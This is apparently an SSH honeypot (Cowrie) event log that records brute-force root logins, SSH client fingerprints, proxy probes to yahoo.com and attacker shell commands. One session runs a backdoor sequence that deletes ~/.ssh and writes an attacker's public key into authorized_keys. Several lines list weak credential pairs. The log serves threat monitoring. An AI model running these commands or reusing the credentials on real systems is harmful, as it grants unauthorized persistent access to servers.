{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-26T00:56:33.608928Z","src_ip":"36.89.28.139","session":"9f4b19ea12d5"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:56:33.609967Z","src_ip":"36.89.28.139","session":"9f4b19ea12d5"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.231.21","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 74.6.231.21:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:56:33.630231Z","src_ip":"213.209.150.239","session":"6bc3483d387d"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:24:120d::1:0","dst_port":80,"src_ip":"213.209.150.239","src_port":18138,"message":"direct-tcp connection request to 2001:4998:24:120d::1:0:80 from 127.0.0.1:18138","sensor":"my-vps","timestamp":"2025-08-26T00:56:33.786932Z","session":"6bc3483d387d"}
{"eventid":"cowrie.session.connect","src_ip":"36.89.28.139","src_port":39984,"dst_ip":"1.2.3.4","dst_port":22,"session":"a594f1c7a68d","protocol":"ssh","message":"New connection: 36.89.28.139:39984 (1.2.3.4:22) [session: a594f1c7a68d]","sensor":"my-vps","timestamp":"2025-08-26T00:56:33.803745Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T00:56:33.804512Z","src_ip":"36.89.28.139","session":"a594f1c7a68d"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:24:120d::1:0","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:24:120d::1:0:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:56:33.843535Z","src_ip":"213.209.150.239","session":"6bc3483d387d"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:56:33.900897Z","src_ip":"213.209.150.239","session":"6bc3483d387d"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":56606,"dst_ip":"1.2.3.4","dst_port":22,"session":"29994fa47e07","protocol":"ssh","message":"New connection: 213.209.150.239:56606 (1.2.3.4:22) [session: 29994fa47e07]","sensor":"my-vps","timestamp":"2025-08-26T00:56:33.946946Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T00:56:33.947726Z","src_ip":"213.209.150.239","session":"29994fa47e07"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T00:56:33.994841Z","src_ip":"213.209.150.239","session":"29994fa47e07"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T00:56:34.010630Z","src_ip":"36.89.28.139","session":"a594f1c7a68d"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T00:56:34.229710Z","src_ip":"213.209.150.239","session":"29994fa47e07"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.231.20","dst_port":80,"src_ip":"213.209.150.239","src_port":5484,"message":"direct-tcp connection request to 74.6.231.20:80 from 127.0.0.1:5484","sensor":"my-vps","timestamp":"2025-08-26T00:56:34.277993Z","session":"29994fa47e07"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.231.20","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 74.6.231.20:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:56:34.325221Z","src_ip":"213.209.150.239","session":"29994fa47e07"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:44:3507::8001","dst_port":80,"src_ip":"213.209.150.239","src_port":16894,"message":"direct-tcp connection request to 2001:4998:44:3507::8001:80 from 127.0.0.1:16894","sensor":"my-vps","timestamp":"2025-08-26T00:56:34.461394Z","session":"29994fa47e07"}
{"eventid":"cowrie.login.success","username":"root","password":"Server2024@","message":"login attempt [root/Server2024@] succeeded","sensor":"my-vps","timestamp":"2025-08-26T00:56:34.474499Z","src_ip":"27.112.78.170","session":"7956d706bd5e"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:44:3507::8001","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:44:3507::8001:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:56:34.508442Z","src_ip":"213.209.150.239","session":"29994fa47e07"}
{"eventid":"cowrie.session.closed","duration":"0.6","message":"Connection lost after 0.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:56:34.556350Z","src_ip":"213.209.150.239","session":"29994fa47e07"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":56652,"dst_ip":"1.2.3.4","dst_port":22,"session":"608866a4faf2","protocol":"ssh","message":"New connection: 213.209.150.239:56652 (1.2.3.4:22) [session: 608866a4faf2]","sensor":"my-vps","timestamp":"2025-08-26T00:56:34.612282Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T00:56:34.613198Z","src_ip":"213.209.150.239","session":"608866a4faf2"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T00:56:34.670045Z","src_ip":"213.209.150.239","session":"608866a4faf2"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-26T00:56:34.876006Z","src_ip":"36.89.28.139","session":"a594f1c7a68d"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T00:56:34.952909Z","src_ip":"213.209.150.239","session":"608866a4faf2"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T00:56:35.075826Z","src_ip":"27.112.78.170","session":"7956d706bd5e"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T00:56:35.076482Z","src_ip":"27.112.78.170","session":"7956d706bd5e"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T00:56:35.077519Z","src_ip":"27.112.78.170","session":"7956d706bd5e"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.231.21","dst_port":80,"src_ip":"213.209.150.239","src_port":12403,"message":"direct-tcp connection request to 74.6.231.21:80 from 127.0.0.1:12403","sensor":"my-vps","timestamp":"2025-08-26T00:56:35.079103Z","session":"608866a4faf2"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.231.21","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 74.6.231.21:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:56:35.136306Z","src_ip":"213.209.150.239","session":"608866a4faf2"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:44:3507::8000","dst_port":80,"src_ip":"213.209.150.239","src_port":18213,"message":"direct-tcp connection request to 2001:4998:44:3507::8000:80 from 127.0.0.1:18213","sensor":"my-vps","timestamp":"2025-08-26T00:56:35.291114Z","session":"608866a4faf2"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:56:35.339186Z","src_ip":"27.112.78.170","session":"7956d706bd5e"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:44:3507::8000","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:44:3507::8000:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:56:35.347766Z","src_ip":"213.209.150.239","session":"608866a4faf2"}
{"eventid":"cowrie.session.closed","duration":"0.8","message":"Connection lost after 0.8 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:56:35.405849Z","src_ip":"213.209.150.239","session":"608866a4faf2"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":56709,"dst_ip":"1.2.3.4","dst_port":22,"session":"b05a30b18087","protocol":"ssh","message":"New connection: 213.209.150.239:56709 (1.2.3.4:22) [session: b05a30b18087]","sensor":"my-vps","timestamp":"2025-08-26T00:56:35.451448Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T00:56:35.452347Z","src_ip":"213.209.150.239","session":"b05a30b18087"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T00:56:35.499507Z","src_ip":"213.209.150.239","session":"b05a30b18087"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T00:56:35.734032Z","src_ip":"213.209.150.239","session":"b05a30b18087"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"98.137.11.163","dst_port":80,"src_ip":"213.209.150.239","src_port":15665,"message":"direct-tcp connection request to 98.137.11.163:80 from 127.0.0.1:15665","sensor":"my-vps","timestamp":"2025-08-26T00:56:35.782294Z","session":"b05a30b18087"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"98.137.11.163","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 98.137.11.163:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:56:35.829439Z","src_ip":"213.209.150.239","session":"b05a30b18087"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T00:56:35.955284Z","src_ip":"27.112.78.170","session":"7956d706bd5e"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-26T00:56:35.956074Z","src_ip":"27.112.78.170","session":"7956d706bd5e"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:24:120d::1:0","dst_port":80,"src_ip":"213.209.150.239","src_port":12332,"message":"direct-tcp connection request to 2001:4998:24:120d::1:0:80 from 127.0.0.1:12332","sensor":"my-vps","timestamp":"2025-08-26T00:56:35.965530Z","session":"b05a30b18087"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:24:120d::1:0","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:24:120d::1:0:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:56:36.012613Z","src_ip":"213.209.150.239","session":"b05a30b18087"}
{"eventid":"cowrie.session.closed","duration":"0.6","message":"Connection lost after 0.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:56:36.060597Z","src_ip":"213.209.150.239","session":"b05a30b18087"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":56764,"dst_ip":"1.2.3.4","dst_port":22,"session":"e467fc61ff15","protocol":"ssh","message":"New connection: 213.209.150.239:56764 (1.2.3.4:22) [session: e467fc61ff15]","sensor":"my-vps","timestamp":"2025-08-26T00:56:36.116154Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T00:56:36.117267Z","src_ip":"213.209.150.239","session":"e467fc61ff15"}
{"eventid":"cowrie.session.closed","duration":"2.4","message":"Connection lost after 2.4 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:56:36.166130Z","src_ip":"36.89.28.139","session":"a594f1c7a68d"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T00:56:36.173965Z","src_ip":"213.209.150.239","session":"e467fc61ff15"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-26T00:56:36.219450Z","src_ip":"27.112.78.170","session":"7956d706bd5e"}
